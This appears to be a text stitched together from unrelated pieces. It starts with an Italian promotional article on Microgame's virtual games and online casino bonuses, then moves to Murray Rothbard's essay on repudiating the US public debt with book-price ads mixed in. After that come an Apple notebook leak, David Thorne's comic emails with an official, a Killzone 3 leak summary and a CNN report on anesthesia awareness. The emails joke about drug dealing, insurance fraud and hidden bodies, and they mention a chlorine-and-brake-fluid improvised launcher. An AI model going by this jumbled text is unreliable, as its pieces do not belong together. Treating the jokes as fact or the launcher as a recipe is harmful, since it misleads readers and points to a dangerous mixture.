Ma posto questa premessa marinara , ci sono segmenti avveniristici del gioco che .
Invece .
hanno successo e che raccolgono e registrano aumenti esponenziali che fanno almeno sperare per questo segmento qualcosa di positivo che apre un poco i cuori degli addetti ai lavori .
Si vuole , infatti , parlare del successo dei Virtual Games di Microgame che , solo nello scorso anno 2016 , hanno registrato un aumento di +36,5 % nei volumi di raccolta che , di questi tempi , è un grandissimo risultato .
Ogni tendenza di mercato viene stracciata e l’evoluzione su base annua del prodotto “ virtual games ” fornito appunto da Microgame , provider italiano , diventa un asset sempre più realistico per il business dell ’e - gaming .
Numeri assolutamente positivi che discendono dal semplice confronto tra i volumi di gioco dei virtual games registrati nel 2015 con quelli dell ’ anno appena concluso : cifre , secondo il provider leader nel mercato nazionale , che hanno una buona incidenza anche nel segmento online che è indubbiamente molto meno “ impattante ” del segmento terrestre .
Microgame , che non ha più bisogno né di presentazioni né tanto meno di “ elogi ” ottiene , così , un rialzo assai confortante : +7,14 % sui virtual games online ed addirittura +35,92 % sulla raccolta riscontrata nei punti fisici dove viene proposta l’offerta di Pianeta Scommesse , provider del Gruppo Microgame , operante sul canale terrestre .
L’aumento dei dati in crescita per volume , ovviamente , significa anche aumento delle tendenze dei profitti assicurati ai clienti di Microgame : l ’incremento in questo caso sfiora il 3 % nel solo confronto tra il 2015 ed il recentissimo 2016 .
L’impennata dei prodotti
Microgame ha ancora più valore in assoluto se viene confrontata con l’andamento del mercato di settore che , anche se in crescita , fa registrare “ scostamenti ” più contenuti , cioè circa il 6 % in più nella raccolta e poco superiore al 4 % l ’incremento dei guadagni .
Sempre più alti , conseguentemente , i margini di guadagno ed i bonus gratis dei casino online per i clienti del provider italiano che anche per i suoi virtual games ha puntato su di un’offerta multipiattaforma in grado di assicurare una innovazione tecnologica portata al massimo , con una gamma inverosimile da selezionare e , sopratutto , con “ specialità ” al top che renderanno indimenticabili le esperienze dei giocatori che avranno il “ fiuto ” di scegliere i giochi di questo provider in crescita esponenziale , se questo sarà possibile , visti i risultati già raggiunti .
Qui si è di fronte ad una dimostrazione di qualità , supportata da risultati operativi che segue il risultato ottimo dello scorso anno , quando “ i virtual ” di Microgame avevano già raggiunto una performance positiva nonostante il mercato di settore fosse in controtendenza .
Miracoli della tecnologia Microgame , delle sue strategie e del suo marketing ?
Oppure “ sete ” da parte dei giocatori che scelgono questi nuovi giochi e che trovano queste proposte coinvolgenti ed accattivanti ?
La verità , come sempre , starà nel mezzo e solo tra qualche mese si potrà confermare il successo di questo nostro provider che è riuscito a trovare la “ strada giusta e legale ” per farsi apprezzare , scegliere e divertire .
In the spring of 1981 , conservative Republicans in the House of Representatives cried .
They cried because , in the first flush of the Reagan Revolution that was supposed to bring drastic cuts in taxes and government spending , as well as a balanced budget , they were being asked by the White House and their own leadership to vote for an increase in the statutory limit on the federal public debt , which was then scraping the legal ceiling of $ 1 trillion .
They cried because all of their lives they had voted against an increase in public debt , and now they were being asked , by their own party and their own movement , to violate their lifelong principles .
The White House and its leadership assured them that this breach in principle would be their last : that it was necessary for one last increase in the debt limit to give President Reagan a chance to bring about a balanced budget and to begin to reduce the debt .
Many of these Republicans tearfully announced that they were taking this fateful step because they deeply trusted their president , who would not let them down .
Famous last words .
In a sense , the Reagan handlers were right : there were no more tears , no more complaints , because the principles themselves were quickly forgotten , swept into the dustbin of history .
Deficits and the public debt have piled up mountainously since then , and few people care , least of all conservative Republicans .
Every few years , the legal limit is raised automatically .
By the end of the Reagan reign the federal debt was $ 2.6 trillion ; now it is $ 3.5 trillion and rising rapidly .
And this is the rosy side of the picture , because if you add in “ off - budget ” loan guarantees and contingencies , the grand total federal debt is $ 20 trillion .
Before the Reagan era , conservatives were clear about how they felt about deficits and the public debt : a balanced budget was good , and deficits and the public debt were bad , piled up by free - spending Keynesians and socialists , who absurdly proclaimed that there was nothing wrong or onerous about the public debt .
In the famous words of the left - Keynesian apostle of “ functional finance , ” Professor Abba Lernr , there is nothing wrong with the public debt because “ we owe it to ourselves . ”
In those days , at least , conservatives were astute enough to realize that it made an enormous amount of difference whether – slicing through the obfuscatory collective nouns – one is a member of the “ we ” ( the burdened taxpayer ) or of the “ ourselves ” ( those living off the proceeds of taxation ) .
Since Reagan , however , intellectual - political life has gone topsy - turvy .
Conservatives and allegedly “ free - market ” economists have turned handsprings trying to find new reasons why “ deficits do n’t matter , ” why we should all relax and enjoy the process .
Perhaps the most absurd argument of Reaganomists was that we should not worry about growing public debt because it is being matched on the federal balance sheet by an expansion of public “ assets . ”
Here was a new twist on free - market macroeconomics : things are going well because the value of government assets is rising !
In that case , why not have the government nationalize all assets outright ?
Reaganomists , indeed , came up with every conceivable argument for the public debt except the phrase of Abba Lerner , and I am convinced that they did not recycle that phrase because it would be difficult to sustain with a straight face at a time when foreign ownership of the national debt is skyrocketing .
Even apart from foreign ownership , it is far more difficult to sustain the Lerner thesis than before ; in the late 1930s , when Lerner enunciated his thesis , total federal interest payments on the public debt were $ 1 billion ; now they have zoomed to $ 200 billion , the third - largest item in the federal budget , after the military and Social Security : the “ we ” are looking ever shabbier compared to the “ ourselves . ”
To think sensibly about the public debt , we first have to go back to first principles and consider debt in general .
Put simply , a credit transaction occurs when C , the creditor , transfers a sum of money ( say $ 1,000 ) to D , the debtor , in exchange for a promise that D will repay C in a year ’s time the principal plus interest .
If the agreed interest rate on the transaction is 10 percent , then the debtor obligates himself to pay in a year ’s time $ 1,100 to the creditor .
This repayment completes the transaction , which in contrast to a regular sale , takes place over time .
For a New Liberty : The ... Murray Rothbard Best Price : $ 3.99 Buy New $ 6.49 ( as of 05:35 EST - Details )
So far , it is clear that there is nothing “ wrong ” with private debt .
As with any private trade or exchange on the market , both parties to the exchange benefit , and no one loses .
But suppose that the debtor is foolish , gets himself in over his head , and then finds that he ca n’t repay the sum he had agreed on ?
This , of course is a risk incurred by debt , and the debtor had better keep his debts down to what he can surely repay .
But this is not a problem of debt alone .
Any consumer may spend foolishly ; a man may blow his entire paycheck on an expensive trinket and then find that he can’t feed his family .
So consumer foolishness is hardly a problem confined to debt alone .
But there is one crucial difference : if a man gets in over his head and he can’t pay , the creditor suffers too , because the debtor has failed to return the creditor ’s property .
In a profound sense , the debtor who fails to repay the $ 1,100 owed to the creditor has stolen property that belongs to the creditor ; we have here not simply a civil debt , but a tort , an aggression against another ’s property .
In earlier centuries , the insolvent debtor ’s offense was considered grave , and unless the creditor was willing to “ forgive ” the debt out of charity , the debtor continued to owe the money plus accumulating interest , plus penalty for continuing nonpayment .
Often , debtors were clapped into jail until they could pay – a bit draconian perhaps , but at least in the proper spirit of enforcing property rights and defending the sanctity of contracts .
The major practical problem was the difficulty for debtors in prison to earn the money to repay the loan ; perhaps it would have been better to allow the debtor to be free , provided that his continuing income went to paying the creditor his just due .
As early as the 17th century , however , governments began sobbing about the plight of the unfortunate debtors , ignoring the fact that the insolvent debtors had gotten themselves into their own fix , and they began to subvert their own proclaimed function of enforcing contracts .
Bankruptcy laws were passed which , increasingly , let the debtors off the hook and prevented the creditors from obtaining their own property .
Theft was increasingly condoned , improvidence was subsidized , and thrift was hobbled .
In fact , with the modern device of Chapter 11 , instituted by the Bankruptcy Reform Act of 1978 , inefficient and improvident managers and stockholders are not only let off the hook , but they often remain in positions of power , debt - free and still running their firms , and plaguing consumers and creditors with their inefficiencies .
Modern utilitarian neoclassical economists see nothing wrong with any of this ; the market , after all , “ adjusts ” to these changes in the law .
It is true that the market can adjust to almost anything , but so what ?
Hobbling creditors means that interest rates rise permanently , to the sober and honest as well as the improvident ; but why should the former be taxed to subsidize the latter ?
But there are deeper problems with this utilitarian attitude .
It is the same amoral claim , from the same economists , that there is nothing wrong with rising crime against residents or storekeepers of the inner cities .
The market , they assert , will adjust and discount for such high crime rates , and therefore rents and housing values will be lower in the inner-city areas .
So everything will be taken care of .
But what sort of consolation is that ?
And what sort of justification for aggression and crime ?
America ’s Great ... Rothbard , Murray N. Best Price : $ 2.12 Buy New $ 59.88 ( as of 01:10 EST - Details )
In a just society , then , only voluntary forgiveness by creditors would let debtors off the hook ; otherwise , bankruptcy laws are an unjust invasion of the property rights of creditors .
One myth about “ debtors ' ” relief is that debtors are habitually poor and creditors rich , so that intervening to save debtors is merely a requirement of egalitarian “ fairness . ”
But this assumption was never true : in business , the wealthier the businessman the more likely he is to be a large debtor .
It is the Donald Trumps and Robert Maxwells of this world whose debts spectacularly exceed their assets .
Intervention on behalf of debtors has generally been lobbied for by large businesses with large debts .
In modern corporations , the effect of ever - tightening bankruptcy laws has been to hobble the creditor - bondholders for the benefit of the stockholders and the existing managers , who are usually installed by , and allied with , a few dominant large stockholders .
The very fact that a corporation is insolvent demonstrates that its managers have been inefficient , and they should be removed promptly from the scene .
Bankruptcy laws that keep prolonging the rule of existing managers , then , not only invade the property rights of the creditors ; they also injure the consumers and the entire economic system by preventing the market from purging the inefficient and improvident managers and stockholders and from shifting the ownership of industrial assets to the more efficient creditors .
Not only that ; in a recent law review article , Bradley and Rosenzweig have shown that the stockholders , too , as well as the creditors , have lost a significant amount of assets due to the installation of Chapter 11 in 1978 .
As they write , “ if bondholders and stockholders are both losers under Chapter 11 , then who are the winners ? ”
The winners , remarkably but unsurprisingly , turn out to be the existing , inefficient corporate managers , as well as the assorted lawyers , accountants , and financial advisers who earn huge fees from bankruptcy reorganizations .
A History of Money and ...
Rothbard , Murray N. Best Price : $ 5.53 Buy New $ 42.06 ( as of 08:00 EST - Details )
In a free - market economy that respects property rights , the volume of private debt is self - policed by the necessity to repay the creditor , since no Papa Government is letting you off the hook .
In addition , the interest rate a debtor must pay depends not only on the general rate of time preference but on the degree of risk he as a debtor poses to the creditor .
A good credit risk will be a “ prime borrower , ” who will pay relatively low interest ; on the other hand , an improvident person or a transient who has been bankrupt before , will have to pay a much higher interest rate , commensurate with the degree of risk on the loan .
Most people , unfortunately , apply the same analysis to public debt as they do to private .
If sanctity of contracts should rule in the world of private debt , should n’t they be equally as sacrosanct in public debt ?
Should n’t public debt be governed by the same principles as private ?
The answer is no , even though such an answer may shock the sensibilities of most people .
The reason is that the two forms of debt - transaction are totally different .
If I borrow money from a mortgage bank , I have made a contract to transfer my money to a creditor at a future date ; in a deep sense , he is the true owner of the money at that point , and if I do n’t pay I am robbing him of his just property .
But when government borrows money , it does not pledge its own money ; its own resources are not liable .
Government commits not its own life , fortune , and sacred honor to repay the debt , but ours .
This is a horse , and a transaction , of a very different color .
For unlike the rest of us , government sells no productive good or service and therefore earns nothing .
It can only get money by looting our resources through taxes , or through the hidden tax of legalized counterfeiting known as “ inflation . ”
There are some exceptions , of course , such as when the government sells stamps to collectors or carries our mail with gross inefficiency , but the overwhelming bulk of government revenues is acquired through taxation or its monetary equivalent .
Actually , in the days of monarchy , and especially in the medieval period before the rise of the modern state , kings got the bulk of their income from their private estates – such as forests and agricultural lands .
Their debt , in other words , was more private than public , and as a result , their debt amounted to next to nothing compared to the public debt that began with a flourish in the late 17th century .
The Case Against the Fed Rothbard , Murray N. Best Price : $ 5.44 Buy New $ 21.96 ( as of 03:00 EST - Details )
The public debt transaction , then , is very different from private debt .
Instead of a low - time - preference creditor exchanging money for an IOU from a high - time - preference debtor , the government now receives money from creditors , both parties realizing that the money will be paid back not out of the pockets or the hides of the politicians and bureaucrats , but out of the looted wallets and purses of the hapless taxpayers , the subjects of the state .
The government gets the money by tax - coercion ; and the public creditors , far from being innocents , know full well that their proceeds will come out of that selfsame coercion .
In short , public creditors are willing to hand over money to the government now in order to receive a share of tax loot in the future .
This is the opposite of a free market , or a genuinely voluntary transaction .
Both parties are immorally contracting to participate in the violation of the property rights of citizens in the future .
Both parties , therefore , are making agreements about other people ’s property , and both deserve the back of our hand .
The public credit transaction is not a genuine contract that need be considered sacrosanct , any more than robbers parceling out their shares of loot in advance should be treated as some sort of sanctified contract .
Any melding of public debt into a private transaction must rest on the common but absurd notion that taxation is really “ voluntary , ” and that whenever the government does anything , “ we ” are willingly doing it .
This convenient myth was wittily and trenchantly disposed of by the great economist Joseph Schumpeter :
“ The theory which construes taxes on the analogy of club dues or of the purchases of , say , a doctor only proves how far removed this part of the social sciences is from scientific habits of mind . ”
Morality and economic utility generally go hand in hand .
Contrary to Alexander Hamilton , who spoke for a small but powerful clique of New York and Philadelphia public creditors , the national debt is not a “ national blessing . ”
The annual government deficit , plus the annual interest payment that keeps rising as the total debt accumulates , increasingly channels scarce and precious private savings into wasteful government boondoggles , which “ crowd out ” productive investments .
Establishment economists , including Reaganomists , cleverly fudge the issue by arbitrarily labeling virtually all government spending as “ investments , ” making it sound as if everything is fine and dandy because savings are being productively “ invested . ”
In reality , however , government spending only qualifies as “ investment ” in an Orwellian sense ; government actually spends on behalf of the “ consumer goods ” and desires of bureaucrats , politicians , and their dependent client groups .
Government spending , therefore , rather than being “ investment , ” is consumer spending of a peculiarly wasteful and unproductive sort , since it is indulged not by producers but by a parasitic class that is living off , and increasingly weakening , the productive private sector .
Thus , we see that statistics are not in the least “ scientific ” or “ value - free ” ; how data are classified – whether , for example , government spending is “ consumption ” or “ investment ” – depends upon the political philosophy and insights of the classifier .
The Mystery Of Banking Rothbard , Murray N. Best Price : $ 94.60 Buy New null ( as of 12:55 EST - Details )
Deficits and a mounting debt , therefore , are a growing and intolerable burden on the society and economy , both because they raise the tax burden and increasingly drain resources from the productive to the parasitic , counterproductive , “ public ” sector .
Moreover , whenever deficits are financed by expanding bank credit – in other words , by creating new money – matters become still worse , since credit inflation creates permanent and rising price inflation as well as waves of boom - bust “ business cycles . ”
It is for all these reasons that the Jeffersonians and Jacksonians ( who , contrary to the myths of historians , were extraordinarily knowledgeable in economic and monetary theory ) hated and reviled the public debt .
Indeed , the national debt was paid off twice in American history , the first time by Thomas Jefferson and the second , and undoubtedly the last time , by Andrew Jackson .
Unfortunately , paying off a national debt that will soon reach $ 4 trillion would quickly bankrupt the entire country .
Think about the consequences of imposing new taxes of $ 4 trillion in the United States next year !
Another way , and almost as devastating , a way to pay off the public debt would be to print $ 4 trillion of new money – either in paper dollars or by creating new bank credit .
This method would be extraordinarily inflationary , and prices would quickly skyrocket , ruining all groups whose earnings did not increase to the same extent , and destroying the value of the dollar .
But in essence this is what happens in countries that hyper- inflate , as Germany did in 1923 , and in countless countries since , particularly the Third World .
If a country inflates the currency to pay off its debt , prices will rise so that the dollars or marks or pesos the creditor receives are worth a lot less than the dollars or pesos they originally lent out .
When an American purchased a 10,000 mark German bond in 1914 , it was worth several thousand dollars ; those 10,000 marks by late 1923 would not have been worth more than a stick of bubble gum .
Inflation , then , is an underhanded and terribly destructive way of indirectly repudiating the “ public debt ” ; destructive because it ruins the currency unit , which individuals and businesses depend upon for calculating all their economic decisions .
What Has Government Do ... Murray N. Rothbard Best Price : $ 3.50 Buy New $ 9.95 ( as of 05:45 EST - Details )
I propose , then , a seemingly drastic but actually far less destructive way of paying off the public debt at a single blow : outright debt repudiation .
Consider this question : why should the poor , battered citizens of Russia or Poland or the other ex-Communist countries be bound by the debts contracted by their former Communist masters ?
In the Communist situation , the injustice is clear : that citizens struggling for freedom and for a free - market economy should be taxed to pay for debts contracted by the monstrous former ruling class .
But this injustice only differs by degree from “ normal ” public debt .
For , conversely , why should the Communist government of the Soviet Union have been bound by debts contracted by the Czarist government they hated and overthrew ?
And why should we , struggling American citizens of today , be bound by debts created by a past ruling elite who contracted these debts at our expense ?
One of the cogent arguments against paying blacks “ reparations ” for past slavery is that we , the living , were not slaveholders .
Similarly , we the living did not contract for either the past or the present debts incurred by the politicians and bureaucrats in Washington .
Although largely forgotten by historians and by the public , repudiation of public debt is a solid part of the American tradition .
The first wave of repudiation of state debt came during the 1840s , after the panics of 1837 and 1839 .
Those panics were the consequence of a massive inflationary boom fueled by the Whig-run Second Bank of the United States .
Riding the wave of inflationary credit , numerous state governments , largely those run by the Whigs , floated an enormous amount of debt , most of which went into wasteful public works ( euphemistically called “ internal improvements ” ) , and into the creation of inflationary banks .
Outstanding public debt by state governments rose from $ 26 million to $ 170 million during the decade of the 1830s .
Most of these securities were financed by British and Dutch investors .
Man , Economy , and Stat ... Murray N. Rothbard Best Price : $ 23.43 Buy New $ 29.95 ( as of 08:10 EST - Details )
During the deflationary 1840s succeeding the panics , state governments faced repayment of their debt in dollars that were now more valuable than the ones they had borrowed .
Many states , now largely in Democratic hands , met the crisis by repudiating these debts , either totally or partially by scaling down the amount in “ readjustments . ”
Specifically , of the 28 American states in the 1840s , 9 were in the glorious position of having no public debt , and 1 ( Missouri ’s ) was negligible ; of the 18 remaining , 9 paid the interest on their public debt without interruption , while another 9 ( Maryland , Pennsylvania , Indiana , Illinois , Michigan , Arkansas , Louisiana , Mississippi , and Florida ) repudiated part or all of their liabilities .
Of these states , four defaulted for several years in their interest payments , whereas the other five ( Michigan , Mississippi , Arkansas , Louisiana , and Florida ) totally and permanently repudiated their entire outstanding public debt .
As in every debt repudiation , the result was to lift a great burden from the backs of the taxpayers in the defaulting and repudiating states .
Apart from the moral , or sanctity - of - contract argument against repudiation that we have already discussed , the standard economic argument is that such repudiation is disastrous , because who , in his right mind , would lend again to a repudiating government ?
But the effective counterargument has rarely been considered : why should more private capital be poured down government rat holes ?
It is precisely the drying up of future public credit that constitutes one of the main arguments for repudiation , for it means beneficially drying up a major channel for the wasteful destruction of the savings of the public .
What we want is abundant savings and investment in private enterprises , and a lean , austere , low - budget , minimal government .
The people and the economy can only wax fat and prosperous when their government is starved and puny .
The next great wave of state debt repudiation came in the South after the blight of Northern occupation and Reconstruction had been lifted from them .
Eight Southern states ( Alabama , Arkansas , Florida , Louisiana , North Carolina , South Carolina , Tennessee , and Virginia ) proceeded , during the late 1870s and early 1880s under Democratic regimes , to repudiate the debt foisted upon their taxpayers by the corrupt and wasteful carpetbag Radical Republican governments under Reconstruction .
Economic Controversies ...
Murray N. Rothbard Best Price : $ 13.49 Buy New $ 18.95 ( as of 08:10 EST - Details )
So what can be done now ?
The current federal debt is $ 3.5 trillion .
Approximately $ 1.4 trillion , or 40 percent , is owned by one or another agency of the federal government .
It is ridiculous for a citizen to be taxed by one arm of the federal government ( the IRS ) to pay interest and principal on debt owned by another agency of the federal government .
It would save the taxpayer a great deal of money , and spare savings from further waste , to simply cancel that debt outright .
The alleged debt is simply an accounting fiction that provides a mask over reality and furnishes a convenient means for mulcting the taxpayer .
Thus , most people think that the Social Security Administration takes their premiums and accumulates it , perhaps by sound investment , and then “ pays back ” the “ insured ” citizen when he turns 65 .
Nothing could be further from the truth .
There is no insurance and there is no “ fund , ” as there indeed must be in any system of private insurance .
The federal government simply takes the Social Security “ premiums ” ( taxes ) of the young person , spends them in the general expenditures of the Treasury , and then , when the person turns 65 , taxes someone else to pay the “ insurance benefit . ”
Social Security , perhaps the most revered institution in the American polity , is also the greatest single racket .
It ’s simply a giant Ponzi scheme controlled by the federal government .
But this reality is masked by the Social Security Administration ’s purchase of government bonds , the Treasury then spending these funds on whatever it wishes .
But the fact that the SSA has government bonds in its portfolio , and collects interest and payment from the American taxpayer , allows it to masquerade as a legitimate insurance business .
Canceling federal agency - held bonds , then , reduces the federal debt by 40 percent .
I would advocate going on to repudiate the entire debt outright , and let the chips fall where they may .
The glorious result would be an immediate drop of $ 200 billion in federal expenditures , with at least the fighting chance of an equivalent cut in taxes .
The Panic Of 1819 : Rea ... Rothbard , Murray N. Best Price : null Buy New $ 32.95 ( as of 01:10 EST - Details )
But if this scheme is considered too draconian , why not treat the federal government as any private bankrupt is treated ( forgetting about Chapter 11 ) ?
The government is an organization , so why not liquidate the assets of that organization and pay the creditors ( the government bondholders ) a pro-rata share of those assets ?
This solution would cost the taxpayer nothing , and , once again , relieve him of $ 200 billion in annual interest payments .
The United States government should be forced to disgorge its assets , sell them at auction , and then pay off the creditors accordingly .
What government assets ?
There are a great deal of assets , from TVA to the national lands to various structures such as the Post Office .
The massive CIA headquarters at Langley , Virginia , should raise a pretty penny for enough condominium housing for the entire work force inside the Beltway .
Perhaps we could eject the United Nations from the United States , reclaim the land and buildings , and sell them for luxury housing for the East Side gliterati .
Another serendipity out of this process would be a massive privatization of the socialized land of the western United States and of the rest of America as well .
This combination of repudiation and privatization would go a long way to reducing the tax burden , establishing fiscal soundness , and desocializing the United States .
In order to go this route , however , we first have to rid ourselves of the fallacious mindset that conflates public and private , and that treats government debt as if it were a productive contract between two legitimate property owners .
Day 16 of Robert Wenzel ’s 30 - day reading list that will lead you to become a knowledgeable libertarian , this article first ran in the June 1992 issue of Chronicles ( pp. 49 –52 ) .
The Best of Murray N. Rothbard
An astute reader on Reddit noticed that four new Apple Notebook SKUs appeared in the Microcenter purchasing system today .
The four notebooks are labeled : " Apple System Good - USA , " " Mac System # 1 Best - USA , " " Mac System # 2 Best - USA , " " Mac System Better - USA . "
The four SKUs , which show up under a search for " Apple Notebooks , " are likely to correspond to new Macbook or Macbook Pro models ranging anywhere from $ 1,799 to $ 2,299 .
This falls neatly in line with Apple 's existing pricing of notebooks .
The submitter of this news went on to state : " This all just showed up in my system at microcenter , with model numbers and price .
The week before the Macbook came out in November this came up the same way , with a correct model number and price .
Looks like we might get new MBPs Tuesday ... "
We take this news to point strongly to the release of at least four new Apple notebook configurations next week .
David ThorneFriday 26 February 2010 8.12 pmMichael HardingCensorshipDear
Mike , Thank you for your letter .
At no time have I condoned the use of drugs .
I simply stated that I wish to purchase and sell them at a profit .
I do however understand the importance of censorship .
Without an enforced system of guidance from agencies such as yours , people would be forced to exercise their own discretion .
Regards , David .
Michael HardingSaturday 27 February 2010 10.27 amDavid ThorneRe : CensorshipDavid , your obvious disrespect for authority does n't change the fact that soliciting money for the purpose of purchasing and selling drugs is a criminal offence under South Australian law .
I advise you to remove the article and I will check that you have done so by 5 pm tomorrow .
Yours sincerely , Michael HardingDavid ThorneSaturday 27 February 2010 10.44amMichael HardingRe : Re : CensorshipDear Michael , Despite your assumption , I have the highest amount of respect for authority .
I actually wanted to become a police officer but failed the IQ test when I arrived on time at the correct building .
While not exactly a police officer , when I was about eight I desperately wanted to be Tom Selleck from Magnum PI .
I painted my Standish Selecta - 12 bright red and constructed a moustache by clipping a large amount of hair from the neighbour 's cat and gluing it to my upper lip .
This is how I discovered my allergy to cat hair .
Dragged to my neighbour 's house , my apology through lips the size of bananas came out as " Imsryfrctnheroffyrcat iwntdtobemgnumpi . "
I also wanted to be frozen and thawed out in the 25th century due to Wilma Deering 's jumpsuit but despite emptying the refrigerator and sitting in it for over an hour , the only result was mild hypothermia and a belting .
I have been considering sitting the police exam again as protecting the community from burglars , murderers and blogs must be very fulfilling .
I am fairly fit due to regularly thinking about jogging and I once performed a jumping jack .
It was unintentional and involved a spider on the bath mat but still counts .
I am also experienced in self defence and recently built a moat .
Sometimes , I dress as a French mime and pretend to walk against a strong wind to the delight of those around me .
Everybody loves a mime .
This skill would obviously come in quite useful during police stealth operations .
Due to restrictive Australian gun laws , I do not have much experience with weapons but I did construct my own bazooka when I was about ten using a length of pipe , a securely tightened end cap , a golf ball and a three to one ratio of chlorine & brake fluid .
While the design was flawless , the resulting broken collar bone from the kickback and two inch hole through two plaster walls then a television set brought a swift end to my foray into ballistic research and development .
Regards , David .
Michael HardingSaturday 27 February 2010 2.09 pmDavid ThorneRe : Re : Re : CensorshipDavid , this is n't the first time we 've received complaints regarding your website .
You have until 5 pm tomorrow to remove the article and I 'll be checking your website regularly .
You might not take this seriously but I can assure you that we do .
Yours sincerely , Michael HardingDavid ThorneSaturday 27 February 2010 3.18 pmMichael HardingRe : Re : Re : Re : CensorshipDear Michael , I do indeed take the matter seriously and will attempt to facilitate your request by 5 pm tomorrow despite the fact that I am extremely busy this weekend .
I need to bury the two dead backpackers I have in the spare room as the smell is starting to attract suspicion .
And wolves .
It is a fairly large job as one of the backpackers is American and will therefore require a hole several sizes larger than normal .
On the plus side , the other is from England which obviously means no dental records .
I could hire one of those mini bobcat tractors for the day but will probably just let the children out for a game of ' best digger gets food this week ' .
I am sick of hearing " I want my parents " and " Please do n't lock me in the spare room again , it smells funny " but many hands , no matter how small , make light work .
Also , I was watching Crime Stoppers last night and was wondering if you need anyone to play the perpetrators in crime re-enactments ?
I have several years acting experience convincing co-workers that I am listening and care about their relationship issues or what they did on the weekend while really thinking about robots or what would happen if a car made of diamond drove really fast into a wall made of diamond .
I would prefer to play either a black professor or an Asian bus driver .
Regards , David .
Michael HardingSunday 28 February 2010 10.26 amDavid ThorneRe : Re : Re : Re : Re : CensorshipI suggest you spend the time deleting the page as you have been requested to do rather than writing about dead backpackers .
David ThorneSunday 28 February 2010 2.02 pmMichael HardingRe : Re : Re : Re : Re : Re : CensorshipDear
Mike , My apologies for not getting back to you earlier , I was busy torching my vehicle .
Did you know that if you report it stolen the insurance company gives you money to buy a new one ?
I usually do this every eleven months as it saves having to pay for an annual service .
I do not have dead backpackers in the spare room .
I was just being silly .
There is no space in there due to the hydroponics system , pots and bags of nutrients .
I read somewhere that it is ok to have up to three hundred and seventy marijuana plants for personal use .
Correct me if I wrong .
As I do not have a backyard and the plants take up most of the apartment , I sleep in a hammock stretched between two of the larger trunks .
It is like sleeping in a jungle and sometimes I pretend I am a baby monkey .
Due to the 24 hour UV lighting , my electricity bill this month is nearly four thousand dollars but I have an awesome tan .
In regards to the website , rather than deleting the article , I will amend it to be about cats .
Is this acceptable to you ?
Regards , David .
Michael HardingSunday 28 February 2010 2.31 pmDavid ThorneRe : Re : Re : Re : Re : Re : Re : Censorship
It is n't legal to grow even one plant which I 'm sure you already know .
Possession of less than 100g or one plant has been decriminalised but still carries a fine .
Changing the page to be about cats is fine .
I will be checking to see if it has been done by 5 pm .
I strongly suggest that you do so .
David ThorneSunday 28 February 2010 4.17 pmMichael HardingRe : Re : Re : Re : Re : Re : Re : Re : CensorshipDear
Mike , 5 pm eastern standard time or ours ?
Regards , David .
Michael HardingSunday 28 February 2010 4.41 pmDavid ThorneRe : Re : Re : Re : Re : Re : Re : Re : Re : CensorshipOurs .
I 've had enough of your nonsense .
If the page is not removed or changed within the next 20 minutes I will be filing an order under the e-crimes act of 2006 to have the website shut down .
David ThorneSunday 28 February 2010 4.59 pmMichael HardingRe : Re : Re : Re : Re : Re : Re : Re : Re : Re : CensorshipDone .
It seems like Killzone 3 has been unofficially announced and the latest issue of Gamepro which was acquired by gamespot.com user has a ton of details regarding the game .
Check out the leaked scans of the mag below :
( Click images to view full - size )
Killzone 3 details revealed in the mag :
– Will show the Helghast have humanity left in them .
– Will have the feeling that “ of being in a place far away from home , outnumbered by people who want to kill you . ”
– Will be like Inglorious Basterds .
– All of the characters in the screenshots are flying in .. jetpacks ?!
– Will include arctic levels .
– One mission in the game involves rescuing ISA Captain Narville .
– Game is playable in 3D !
– Have to wear 3D glasses , apparently the 3D effects are “ crazy . ”
– Combat is “ unchanged from predecessor . ”
– Or is it ?
Hand to hand combat involves you “ Unloading a string of different ( and often brutal ) attacks on stunned enemies . ”
– The scale is supposed to be “ bigger this time . ”
– The Jetpacks are “ surprisingly lightweight and agile , Killzone 3 ’s jetpack is easier to maneuver compared to the sluggish incarnations of the gadget found in other games . ”
– New weapon called the Wasp , basically shoots a “ flurry of rockets ” at an enemy .
– Will show off the Helgjast culture .
– There is actually a Helghast language , which will be explored in the game .
– Will have “ diverse locales . ”
– Have to sit in the center of the 3D tv for the 3D effects to work .
– 3D in this game is called a “ Game Changer . ”
– Going to have “ Intense Action ”
– Jetpacks double as a weapon , which basically means a machine gun mounted right on top of it .
– If you shoot Helghast with jetpacks , they ’ll “ explode like roman candles ”
– To control the jetpack , you “ have to activate bursts of speed in midair , propelling yourself across further distances . ”
( CNN ) --
When Carol Weiher was having her right eye surgically removed in 1998 , she woke up hearing disco music .
The next thing she heard was " Cut deeper , pull harder . "
She desperately wanted to scream or even move a finger to signal to doctors that she was awake , but the muscle relaxant she 'd received prevented her from controlling her movements .
" I was doing a combination of praying and pleading and cursing and screaming , and trying anything I could do but I knew that there was nothing that was working , " said Weiher , of Reston , Virginia .
Weiher is one of few people who have experienced anesthesia awareness .
Although normally a patient does not remember anything about surgery that involves general anesthesia , about one or two people in every 1,000 may wake up during general anesthesia , according to the Mayo Clinic .
Most of these cases involve the person being aware of the surrounding environment , but some experience severe pain and go on to have psychological problems .
The surgical tools did n't cause Weiher pain -- only pressure -- but the injections of a paralytic drug during the operation " felt like ignited fuel , " she said .
" I thought , well , maybe I 've been wrong about my life , and I 'm in hell , " she said .
The entire surgery lasted five - and - a - half hours .
Sometime during it she either passed out or fell unconscious under the anesthetic .
When she awoke , she began to scream .
" All I could say to anyone was , ' I was awake !
I was awake ! ' " she said .
The use of general anesthesia is normally safe and produces a state of sedation that does n't break in the middle of a procedure , doctors say .
The patient and anesthesiologist collect as much medical history as possible beforehand , including alcohol and drug habits , to help determine the most appropriate anesthetic .
You may think of it as " going to sleep , " but in terms of what your body is doing , general anesthesia has very little in common with taking a nap .
During sleep , the brain is in its most active state ; anesthesia , on the other hand , depresses central nervous system activity .
On the operating table , your brain is less active and consumes less oxygen -- a state of unconsciousness nothing like normal sleep .
Doctors do not know exactly how general anesthesia produces this effect .
It is clear that anesthetic drugs interfere with the transmission of chemicals in the brain across the membranes , or walls , of cells .
But the mechanism is the subject of ongoing research , Dr. Alexander Hannenberg , anesthesiologist in Newton , Massachusetts , and president of the American Society of Anesthesiologists .
Patients who remember falling unconscious under the anesthesia generally have a pleasant experience of it , Hannenberg said , and the period of " waking up " is also a relaxed state , Hannenberg said .
Anesthesia awareness may relate to human error or equipment failure in delivering the anesthetic , Hannenberg said .
There are patients for whom doctors err on the side of a lower dose because of the nature of their condition , Hannenberg said .
Someone who is severely injured and has lost a lot of blood , a patient with compromised cardiac function , or a woman who needs an emergency Caesarean section would all be at risk for serious side effects of high doses of anesthetic .
